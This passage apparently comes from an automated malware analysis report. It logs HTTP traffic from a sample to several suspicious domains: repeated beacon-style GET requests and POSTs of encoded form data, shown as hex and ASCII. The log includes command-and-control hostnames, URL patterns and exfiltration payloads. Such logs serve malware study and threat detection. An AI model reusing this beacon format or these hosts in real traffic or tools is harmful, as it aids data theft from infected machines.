        Source: global trafficHTTP traffic detected: GET /7k8f/?oz=1xd2XIdTc2qaFZ+FWSTYli7OxzQOBufybu6t7KDIboRfwcHmUmPthK5WfpWTXJmR/FSLDU2eJw9bxVvh/BR2RAGhDgY7k/sU7CIWPHYqUL7qqxcngXtaZyk=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.dfmagazine.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: POST /txr6/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.ngmr.xyzOrigin: http://www.ngmr.xyzReferer: http://www.ngmr.xyz/txr6/Content-Length: 199Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 71 52 6f 37 55 57 6c 47 45 32 70 55 6a 58 31 47 76 52 66 63 73 44 4a 6a 63 75 79 4f 6d 48 6b 49 44 72 39 54 42 42 2b 45 54 5a 30 2b 49 4e 42 64 78 2f 35 6d 61 52 62 66 6d 2f 54 74 7a 72 49 39 49 65 2f 56 4c 6b 42 52 41 58 6e 51 35 44 78 4b 6a 42 6e 42 32 54 67 2b 71 57 63 32 34 7a 6d 38 69 4b 42 71 55 58 5a 7a 42 51 4d 42 74 62 5a 36 66 56 38 63 32 34 75 51 30 6e 33 7a 66 61 75 4e 4a 68 70 39 7a 2f 45 6d 34 57 6d 77 37 6f 77 73 74 4e 77 79 51 78 74 45 4c 39 50 71 32 78 7a 35 56 73 34 2b 49 55 31 6e 71 34 48 34 34 2b 2b 79 2f 58 70 39 64 71 31 36 4b 5a 55 69 76 4e 72 55 70 51 3d 3d Data Ascii: oz=qRo7UWlGE2pUjX1GvRfcsDJjcuyOmHkIDr9TBB+ETZ0+INBdx/5maRbfm/TtzrI9Ie/VLkBRAXnQ5DxKjBnB2Tg+qWc24zm8iKBqUXZzBQMBtbZ6fV8c24uQ0n3zfauNJhp9z/Em4Wmw7owstNwyQxtEL9Pq2xz5Vs4+IU1nq4H44++y/Xp9dq16KZUivNrUpQ==
        Source: global trafficHTTP traffic detected: POST /txr6/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.ngmr.xyzOrigin: http://www.ngmr.xyzReferer: http://www.ngmr.xyz/txr6/Content-Length: 219Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 71 52 6f 37 55 57 6c 47 45 32 70 55 6a 33 6c 47 73 79 33 63 6b 44 4a 67 41 2b 79 4f 73 6e 6b 4d 44 72 68 54 42 41 37 44 54 72 51 2b 49 74 78 64 77 36 5a 6d 5a 52 62 66 30 66 54 6f 33 72 49 36 49 65 7a 72 4c 68 68 52 41 55 62 51 35 42 70 4b 6a 57 7a 4f 6e 54 67 34 7a 6d 63 34 38 7a 6d 38 69 4b 42 71 55 58 39 5a 42 55 67 42 73 71 4a 36 4f 45 38 62 6f 6f 75 66 33 6e 33 7a 62 61 75 7a 4a 68 6f 65 7a 36 67 63 34 55 75 77 37 6f 67 73 74 63 77 78 61 78 74 43 50 39 4f 47 78 68 6d 75 4e 75 34 6a 59 6e 4a 33 74 72 2f 7a 30 49 76 6f 69 6c 64 5a 65 35 70 49 4f 70 74 4b 74 50 71 50 30 65 50 52 51 4f 55 49 34 57 77 46 6f 4d 43 75 35 47 54 78 4f 61 4d 3d Data Ascii: oz=qRo7UWlGE2pUj3lGsy3ckDJgA+yOsnkMDrhTBA7DTrQ+Itxdw6ZmZRbf0fTo3rI6IezrLhhRAUbQ5BpKjWzOnTg4zmc48zm8iKBqUX9ZBUgBsqJ6OE8boouf3n3zbauzJhoez6gc4Uuw7ogstcwxaxtCP9OGxhmuNu4jYnJ3tr/z0IvoildZe5pIOptKtPqP0ePRQOUI4WwFoMCu5GTxOaM=
        Source: global trafficHTTP traffic detected: POST /txr6/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.ngmr.xyzOrigin: http://www.ngmr.xyzReferer: http://www.ngmr.xyz/txr6/Content-Length: 7367Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 71 52 6f 37 55 57 6c 47 45 32 70 55 6a 33 6c 47 73 79 33 63 6b 44 4a 67 41 2b 79 4f 73 6e 6b 4d 44 72 68 54 42 41 37 44 54 72 59 2b 49 65 35 64 78 63 52 6d 59 52 62 66 76 66 54 70 33 72 4a 2f 49 65 72 76 4c 68 73 73 41 52 66 51 34 69 68 4b 32 53 66 4f 2b 44 67 34 75 57 63 35 34 7a 6d 54 69 4f 6c 75 55 58 74 5a 42 55 67 42 73 70 42 36 4f 56 38 62 71 6f 75 51 30 6e 33 76 66 61 76 65 4a 68 77 67 7a 37 68 72 37 6c 4f 77 37 4a 51 73 76 75 49 78 48 68 74 41 44 64 4f 65 78 68 37 70 4e 74 63 4a 59 6d 39 5a 74 6f 76 7a 6e 34 71 32 79 57 70 39 66 75 52 41 4f 62 39 33 6e 2f 69 7a 36 5a 2f 6f 57 73 34 67 77 78 30 76 75 75 57 67 6f 32 66 78 50 65 67 59 41 62 2f 44 6e 6c 79 70 62 78 79 6f 2b 62 51 6c 2b 38 76 51 71 2f 62 55 51 61 74 70 46 57 33 50 7a 49 53 50 46 67 73 63 45 6c 43 35 46 4e 43 4d 35 73 48 36 32 33 42 39 36 6c 76 42 36 46 32 4b 47 65 58 50 65 31 75 45 39 4b 34 74 35 79 4b 49 73 56 5a 4b 2f 73 56 61 76 6a 76 7a 59 74 30 77 69 33 6e 34 31 4f 72 41 36 6e 41 4b 2b 4e 70 2b 77 41 66 41 78 39 33 75 35 4d 62 64 6b 46 72 35 56 62 4a 6d 63 54 65 57 6f 72 36 67 31 47 6f 75 2b 53 58 53 51 49 6b 74 2f 38 6d 2b 4b 59 78 67 46 41 75 4a 70 63 45 70 2b 70 6c 2b 39 46 34 78 43 37 53 42 70 66 44 67 6d 79 4a 71 66 79 36 79 39 70 52 42 30 32 78 42 53 36 6b 67 4a 6e 49 4f 70 41 78 53 75 78 58 36 70 46 53 57 59 53 31 58 43 7a 5a 4e 4d 74 4c 49 64 33 56 6b 79 7a 35 4b 78 6f 56 6e 62 77 48 62 4b 42 38 46 6d 47 51 6a 31 66 57 48 66 75 41 54 46 46 2b 42 41 66 2b 79 57 6f 6d 58 69 4f 66 57 76 2b 77 63 50 31 4a 37 4a 77 6a 48 39 61 38 32 77 61 43 76 51 78 68 69 6a 74 2b 5a 55 4d 33 78 78 50 45 7a 47 50 49 33 51 7a 49 5a 42 5a 37 66 34 35 44 62 7a 6d 45 36 44 51 6e 52 52 51 42 4f 44 51 61 42 78 76 56 41 34 36 52 66 73 6f 6a 52 45 65 79 61 59 45 64 46 73 4c 39 30 6b 65 48 52 66 38 68 4c 71 67 6f 4a 7a 58 59 33 52 58 54 4e 4e 2f 79 76 31 47 66 39 35 55 2b 77 55 48 2f 65 4b 4c 72 47 56 33 7a 36 6a 61 30 62 5a 53 47 6e 49 61 6f 79 4e 73 66 48 49 59 6c 4e 76 61 55 57 50 63 61 35 71 68 30 4a 32 45 59 35 6c 47 53 54 6b 68 6e 4f 43 74 37 6d 6b 64 55 55 4f 2b 45 30 6d Data Ascii: oz=qRo7UWlGE2pUj3lGsy3ckDJgA+yOsnkMDrhTBA7DTrY+Ie5dxcRmYRbfvfTp3rJ/IervLhssARfQ4ihK2SfO+Dg4uWc54zmTiOluUXtZBUgBspB6OV8bqouQ0n3vfaveJhwgz7hr7lOw7JQsvuIxHhtADdOexh7pNtcJYm9Ztovzn4q2yWp9fuRAOb93n/iz6Z/oWs4gwx0vuuWgo2fxPegYAb/Dnlypbxyo+bQl+8vQq/bUQatpFW3PzISPFgscElC5FNCM5sH623B96lvB6F2KGeXPe1uE9K4t5yKIsVZK/s
        Source: global trafficHTTP traffic detected: GET /txr6/?oz=nTAbXiRbAR9Tmn1EygfckhJ8auTVp3cQBZgFAHmQGrw0Kpxo+btzHXTBwKiLhdY3AsfxfRA0GE/MmBFG+RiimQs6glJH3Tq6ibBpV287KGVZpLZHDS41jcE=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.ngmr.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: POST /7cy1/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.albero-dveri.onlineOrigin: http://www.albero-dveri.onlineReferer: http://www.albero-dveri.online/7cy1/Content-Length: 199Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 41 73 47 48 4b 68 70 79 59 49 33 49 57 37 77 45 68 62 50 66 6a 64 58 32 48 4e 45 7a 31 32 6e 6e 37 4c 49 62 4d 5a 77 42 38 6f 5a 50 49 63 43 53 5a 6e 74 4c 78 52 55 75 45 75 7a 53 32 56 72 75 44 78 47 6c 58 65 53 32 38 44 2b 37 42 68 72 42 51 4f 2f 65 76 76 7a 65 5a 78 30 4d 4b 35 2f 63 7a 43 51 61 74 55 52 4b 2f 50 4b 55 2b 4f 65 6c 6d 4b 62 58 61 50 54 6d 42 46 36 4a 39 6e 63 35 33 52 31 6b 73 44 49 49 38 2b 70 51 75 74 7a 32 68 70 69 76 31 47 4f 46 58 34 59 48 76 4a 37 49 4f 5a 66 66 38 6d 64 42 4d 46 36 54 64 79 71 47 4b 48 73 74 67 6f 54 4c 54 32 34 66 50 43 79 6e 6a 77 3d 3d Data Ascii: oz=AsGHKhpyYI3IW7wEhbPfjdX2HNEz12nn7LIbMZwB8oZPIcCSZntLxRUuEuzS2VruDxGlXeS28D+7BhrBQO/evvzeZx0MK5/czCQatURK/PKU+OelmKbXaPTmBF6J9nc53R1ksDII8+pQutz2hpiv1GOFX4YHvJ7IOZff8mdBMF6TdyqGKHstgoTLT24fPCynjw==
        Source: global trafficHTTP traffic detected: POST /7cy1/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.albero-dveri.onlineOrigin: http://www.albero-dveri.onlineReferer: http://www.albero-dveri.online/7cy1/Content-Length: 219Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 41 73 47 48 4b 68 70 79 59 49 33 49 45 4b 41 45 69 38 6a 66 32 4e 58 31 4d 74 45 7a 38 57 6e 64 37 4c 45 62 4d 59 30 52 38 61 39 50 49 39 79 53 65 56 46 4c 79 52 55 75 50 4f 79 61 79 56 72 68 44 78 4c 47 58 66 75 32 38 44 71 37 42 67 62 42 54 39 6e 66 75 2f 7a 63 52 52 30 4f 55 4a 2f 63 7a 43 51 61 74 55 45 74 2f 4a 69 55 2b 2f 75 6c 70 4f 50 55 45 66 54 68 43 46 36 4a 71 58 63 39 33 52 31 38 73 44 34 6d 38 38 42 51 75 73 44 32 68 39 4f 73 76 57 4f 66 59 59 5a 4e 68 36 53 76 4a 6f 7a 33 31 6b 70 71 4e 6c 43 6d 63 6b 37 63 58 31 59 4a 6a 37 50 35 58 47 42 33 4e 41 7a 38 2b 77 66 4e 32 47 7a 69 39 79 49 77 69 57 62 30 71 57 31 57 41 62 49 3d Data Ascii: oz=AsGHKhpyYI3IEKAEi8jf2NX1MtEz8Wnd7LEbMY0R8a9PI9ySeVFLyRUuPOyayVrhDxLGXfu28Dq7BgbBT9nfu/zcRR0OUJ/czCQatUEt/JiU+/ulpOPUEfThCF6JqXc93R18sD4m88BQusD2h9OsvWOfYYZNh6SvJoz31kpqNlCmck7cX1YJj7P5XGB3NAz8+wfN2Gzi9yIwiWb0qW1WAbI=
        Source: global trafficHTTP traffic detected: POST /7cy1/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.albero-dveri.onlineOrigin: http://www.albero-dveri.onlineReferer: http://www.albero-dveri.online/7cy1/Content-Length: 7367Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 41 73 47 48 4b 68 70 79 59 49 33 49 45 4b 41 45 69 38 6a 66 32 4e 58 31 4d 74 45 7a 38 57 6e 64 37 4c 45 62 4d 59 30 52 38 61 31 50 49 4c 6d 53 64 79 5a 4c 39 78 55 75 4d 4f 79 5a 79 56 72 34 44 79 37 61 58 66 69 4d 38 42 53 37 54 79 54 42 57 49 4c 66 6b 2f 7a 63 4f 42 30 50 4b 35 2f 4e 7a 42 34 57 74 55 55 74 2f 4a 69 55 2b 38 32 6c 74 61 62 55 47 66 54 6d 42 46 36 7a 39 6e 63 56 33 58 64 47 73 43 4d 59 39 4d 68 51 76 4d 54 32 79 34 69 73 33 47 4f 5a 4d 34 59 59 68 36 4f 77 4a 6f 76 37 31 6e 31 4d 4e 6d 79 6d 63 41 75 6a 43 6e 41 41 79 49 4b 77 4b 46 6c 49 42 77 2f 43 68 69 48 58 2b 6b 54 50 79 32 6f 37 68 51 50 38 77 33 77 55 62 66 4c 70 4b 48 79 7a 34 52 55 6e 34 74 38 6f 2b 63 59 58 6c 36 36 58 6f 4b 34 79 34 44 69 74 64 55 2b 78 6d 63 49 34 59 4d 30 6c 4f 65 32 39 50 55 71 67 4a 78 51 58 6f 70 71 39 47 44 38 5a 65 4d 58 45 4d 62 77 7a 66 47 42 6e 31 6b 65 75 2f 76 4e 6f 35 76 69 54 57 50 54 75 5a 4f 6e 66 77 78 63 71 73 41 6f 6c 57 53 46 48 46 62 63 4e 44 31 7a 50 45 41 38 46 69 48 31 39 4a 35 5a 37 48 66 41 55 54 4d 68 63 31 76 46 45 57 4a 33 4d 59 6b 53 6a 39 4a 5a 59 76 79 59 46 5a 78 42 64 36 4f 54 48 41 6c 58 4f 2b 4f 52 44 61 72 49 36 4c 67 4b 6c 5a 66 76 35 6d 50 67 48 71 62 68 64 33 48 65 32 79 6e 30 35 55 6a 4c 47 76 76 30 32 46 50 67 63 6e 73 46 42 49 42 76 42 6a 42 31 79 2b 64 4b 67 59 49 30 53 78 4d 37 71 55 31 42 71 67 34 67 63 49 37 74 6e 76 48 37 57 5a 44 57 72 42 34 6c 71 56 55 57 41 52 5a 50 61 56 6c 6f 75 41 31 79 42 50 44 46 53 4e 62 69 35 63 72 66 2b 5a 38 2b 59 39 38 77 69 36 74 35 74 44 6f 79 42 74 42 34 58 4a 2f 56 55 7a 2b 34 59 6a 76 33 76 33 78 34 41 62 56 65 61 38 6d 68 7a 62 32 63 68 71 62 42 75 53 52 54 52 56 70 36 61 32 54 47 33 57 71 77 2b 6a 4d 6d 34 45 36 62 4b 2b 6c 5a 51 5a 44 69 6d 6c 6a 48 75 4a 30 73 44 68 37 54 2f 42 6e 32 34 73 48 4c 44 52 32 51 52 75 77 74 33 67 57 73 6d 66 53 7a 35 73 65 48 52 61 34 4b 7a 62 34 46 38 45 69 62 6d 34 61 45 6b 30 46 6d 79 54 4e 71 43 72 41 48 50 63 2b 5a 34 Data Ascii: oz=AsGHKhpyYI3IEKAEi8jf2NX1MtEz8Wnd7LEbMY0R8a1PILmSdyZL9xUuMOyZyVr4Dy7aXfiM8BS7TyTBWILfk/zcOB0PK5/NzB4WtUUt/JiU+82ltabUGfTmBF6z9ncV3XdGsCMY9MhQvMT2y4is3GOZM4YYh6OwJov71n1MNmymcAujCnAAyIKwKFlIBw/ChiHX+kTPy2o7hQP8w3wUbfLpKHyz4RUn4t8o+cYXl66XoK4y4DitdU+xmcI4YM0lOe29PUqgJxQXopq9GD8ZeMXEMbwzfGBn1keu/vNo5viTWPTuZOnfwxcqsAolWSFHFbcND1zPEA8FiH19J5Z7HfAUTMhc1vFEWJ3MYkSj9JZYvyYF
        Source: global trafficHTTP traffic detected: GET /7cy1/?oz=NuunJUERQovrcOQM4pbN0sXyOdFy/3jSqqQUAe4+iYgeK7ulJS9OoncvbeOag3vILBHdN8yfojyADwDpW/rc4czucw94LLL42y8tkGUt2pDt0O2/v+PPRf0=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.albero-dveri.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: POST /qjs8/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.typ67.topOrigin: http://www.typ67.topReferer: http://www.typ67.top/qjs8/Content-Length: 199Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 54 68 67 47 5a 49 58 54 72 6d 4e 33 7a 2f 71 4c 33 7a 30 33 6c 41 54 33 54 30 77 56 50 39 6f 41 4f 4d 65 41 63 62 48 4e 7a 68 39 45 35 71 35 32 38 76 42 78 41 75 74 7a 4b 74 36 38 74 30 53 71 43 43 50 66 34 42 71 5a 6c 72 31 64 52 54 34 2b 50 43 41 36 59 5a 67 31 34 6e 59 74 66 72 78 51 41 78 43 51 72 44 4d 59 6f 79 4e 5a 47 38 59 69 66 36 4b 50 30 2f 5a 46 31 63 35 79 62 76 52 43 44 56 55 75 6f 43 39 35 57 59 67 78 64 76 31 6e 4a 4f 41 55 38 50 5a 31 6b 76 4d 78 76 5a 48 64 55 77 58 7a 71 61 4b 78 73 38 53 4f 42 32 32 50 5a 7a 32 53 58 44 41 44 70 46 38 4b 51 33 48 4e 5a 41 3d 3d Data Ascii: oz=ThgGZIXTrmN3z/qL3z03lAT3T0wVP9oAOMeAcbHNzh9E5q528vBxAutzKt68t0SqCCPf4BqZlr1dRT4+PCA6YZg14nYtfrxQAxCQrDMYoyNZG8Yif6KP0/ZF1c5ybvRCDVUuoC95WYgxdv1nJOAU8PZ1kvMxvZHdUwXzqaKxs8SOB22PZz2SXDADpF8KQ3HNZA==
        Source: global trafficHTTP traffic detected: POST /qjs8/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.typ67.topOrigin: http://www.typ67.topReferer: http://www.typ67.top/qjs8/Content-Length: 219Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 54 68 67 47 5a 49 58 54 72 6d 4e 33 38 36 69 4c 79 51 63 33 6a 67 54 30 4b 30 77 56 57 4e 6f 62 4f 4d 69 41 63 61 44 64 7a 7a 5a 45 34 50 46 32 39 74 35 78 4e 4f 74 7a 53 39 36 31 6a 55 53 31 43 43 44 74 34 42 6d 5a 6c 72 78 64 52 54 6f 2b 50 7a 41 39 5a 4a 67 37 6b 6e 59 72 43 37 78 51 41 78 43 51 72 44 4a 51 6f 79 56 5a 47 49 63 69 66 66 6d 4d 33 2f 59 33 6a 4d 35 79 66 76 52 47 44 56 55 59 6f 44 67 63 57 64 6b 78 64 75 46 6e 49 62 73 54 32 50 5a 7a 70 50 4e 43 67 72 53 51 63 51 76 56 76 39 75 35 6a 75 6d 46 41 67 6e 56 45 42 43 32 55 51 63 78 74 31 46 69 53 31 47 57 45 50 4f 6a 4c 4f 39 46 38 4e 64 46 62 69 4e 64 62 2f 31 61 69 46 73 3d Data Ascii: oz=ThgGZIXTrmN386iLyQc3jgT0K0wVWNobOMiAcaDdzzZE4PF29t5xNOtzS961jUS1CCDt4BmZlrxdRTo+PzA9ZJg7knYrC7xQAxCQrDJQoyVZGIciffmM3/Y3jM5yfvRGDVUYoDgcWdkxduFnIbsT2PZzpPNCgrSQcQvVv9u5jumFAgnVEBC2UQcxt1FiS1GWEPOjLO9F8NdFbiNdb/1aiFs=
        Source: global trafficHTTP traffic detected: POST /qjs8/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.typ67.topOrigin: http://www.typ67.topReferer: http://www.typ67.top/qjs8/Content-Length: 7367Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 54 68 67 47 5a 49 58 54 72 6d 4e 33 38 36 69 4c 79 51 63 33 6a 67 54 30 4b 30 77 56 57 4e 6f 62 4f 4d 69 41 63 61 44 64 7a 7a 52 45 34 39 39 32 39 4b 56 78 43 75 74 7a 62 64 36 77 6a 55 53 38 43 42 7a 70 34 42 36 7a 6c 74 74 64 51 77 77 2b 48 6e 55 39 41 35 67 37 76 48 59 71 66 72 78 46 41 78 53 4d 72 44 5a 51 6f 79 56 5a 47 4f 77 69 57 71 4b 4d 78 2f 5a 46 31 63 35 75 62 76 52 36 44 56 73 49 6f 44 56 70 56 75 73 78 63 4f 56 6e 4f 74 34 54 36 50 5a 78 73 50 4e 61 67 72 50 51 63 52 44 52 76 39 7a 73 6a 70 61 46 43 6e 47 78 55 6c 65 53 43 47 52 36 68 56 56 6d 46 6a 50 64 45 4e 69 4b 50 65 64 79 7a 6f 46 4c 52 7a 52 38 63 4f 35 78 32 42 75 75 69 55 33 6c 49 37 45 46 4c 31 74 57 53 39 63 32 78 64 73 30 49 79 71 76 68 6a 31 48 6b 79 52 2f 6a 6c 69 75 56 76 51 30 33 77 77 48 6c 76 57 38 71 6f 35 30 48 53 39 6c 61 68 5a 68 38 56 61 33 59 38 75 79 74 59 59 49 30 6c 56 49 4c 56 46 72 50 34 48 2b 2f 4c 76 47 77 39 69 37 4c 4e 30 65 43 32 71 43 76 55 77 6c 36 43 48 32 35 52 39 4f 57 6a 48 43 4f 34 58 6b 4a 4c 4d 38 5a 52 42 30 56 59 38 59 73 70 4c 49 71 63 54 6e 77 2b 31 4f 45 52 4f 79 47 75 62 54 30 4d 51 5a 57 38 76 32 2f 51 4e 5a 6e 78 6d 30 5a 4a 5a 74 2b 43 42 64 77 6c 38 32 70 66 4e 46 74 62 44 32 71 74 34 68 4e 67 4e 67 62 44 70 62 2f 4e 33 46 44 72 47 66 75 70 6d 6b 61 6e 4e 48 36 5a 6a 79 58 34 36 4e 68 5a 75 37 7a 76 5a 66 6d 30 66 62 77 63 32 63 6b 72 73 44 56 30 39 4f 42 47 4f 6b 36 51 68 31 37 4d 77 69 34 72 4c 57 59 42 39 67 31 51 4e 55 4c 6f 56 66 67 36 6b 61 42 4d 4d 35 78 64 42 6a 76 32 58 50 5a 4f 70 6d 45 31 69 30 63 76 30 68 69 67 48 53 53 39 41 65 53 33 66 55 59 66 50 43 51 44 46 70 52 78 57 69 67 66 6c 5a 30 5a 62 51 6e 75 51 2b 42 75 4b 70 69 6d 57 2f 30 78 74 56 53 7a 63 6c 48 6a 30 4b 42 35 38 4e 6d 6b 67 6d 57 6b 65 45 30 52 30 56 4e 53 70 38 6a 71 49 53 39 45 59 76 66 54 7a 52 34 51 57 49 59 37 6d 4c 69 51 53 6e 49 34 6b 30 57 75 71 74 7a 42 42 38 33 4b 71 4b 55 54 50 74 74 76 6e 6a 2b 62 37 42 41 50 41 63 6a 41 34 45 33 61 45 64 31 2b 61 36 32 35 55 70 35 51 2b 6f 7a 6c 77 4a 69 38 78 64 31 63 53 44 2b 50 Data Ascii: oz=ThgGZIXTrmN386iLyQc3jgT0K0wVWNobOMiAcaDdzzRE49929KVxCutzbd6wjUS8CBzp4B6zlttdQww+HnU9A5g7vHYqfrxFAxSMrDZQoyVZGOwiWqKMx/ZF1c5ubvR6DVsIoDVpVusxcOVnOt4T6PZxsPNagrPQcRDRv9zsjpaFCnGxUleSCGR6hVVmFjPdENiKPedyzoFLRzR8cO5x2BuuiU3lI7EFL1tWS9c2xds0Iyqvhj1HkyR/jliuVvQ03wwHlvW8qo50HS9lahZh8Va3Y8uytYYI0lVILVFrP4H+/LvGw9i7
        Source: global trafficHTTP traffic detected: GET /qjs8/?oz=ejIma/W1pGRFx7ChnTgroDHkNn1VdqZgcszQV8LCwj4556o206I/YZ5OId3qzm2jECDslwuStodYNwU7Ng5KBO4as1dQdJVJJimzghFMohwqM9lhe6W/0oM=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.typ67.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: POST /phvf/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.greekhause.orgOrigin: http://www.greekhause.orgReferer: http://www.greekhause.org/phvf/Content-Length: 199Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 5a 71 41 4b 68 6a 48 44 71 58 64 35 72 51 58 4c 6e 58 46 45 75 59 4a 41 34 65 63 77 64 4e 2b 61 47 50 30 5a 31 4e 73 64 46 73 74 4c 52 65 64 52 63 42 44 62 38 43 72 62 41 6b 6a 75 6e 42 7a 79 48 36 47 6c 2f 70 62 6e 46 53 6b 4a 51 57 59 43 62 64 76 74 76 49 30 59 33 49 53 51 64 52 76 48 6b 79 62 34 78 49 49 79 79 4e 73 79 31 52 6b 46 6f 46 58 47 53 62 31 6f 63 33 66 70 6e 66 79 68 4b 75 58 6f 37 6c 41 4c 32 44 71 66 49 55 31 57 6d 46 31 74 44 36 58 5a 4a 65 38 6b 51 44 56 78 31 49 77 42 50 66 41 61 57 69 48 6f 55 